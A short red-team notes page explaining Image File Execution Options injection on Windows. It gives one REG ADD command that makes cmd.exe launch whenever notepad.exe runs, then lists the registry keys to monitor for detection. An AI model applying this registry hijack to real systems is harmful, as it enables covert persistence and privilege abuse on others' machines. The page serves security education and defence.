Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Primary Access Token Manipulation
Windows NamedPipes 101 + Privilege Escalation
DLL Hijacking
WebShells
Image File Execution Options Injection
Unquoted Service Paths
Pass The Hash: Privilege Escalation with Invoke-WMIExec
Environment Variable $Path Interception
Weak Service Permissions
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows / OS Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Image File Execution Options Injection

Defense Evasion, Persistence, Privilege Escalation

Execution

Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

[email protected]
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"

Launching a notepad on the victim system:

Same from the cmd shell:

Observations

Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:

References

Previous
WebShells
Next
Unquoted Service Paths
Last updated 2 years ago
Contents
Execution
Observations
References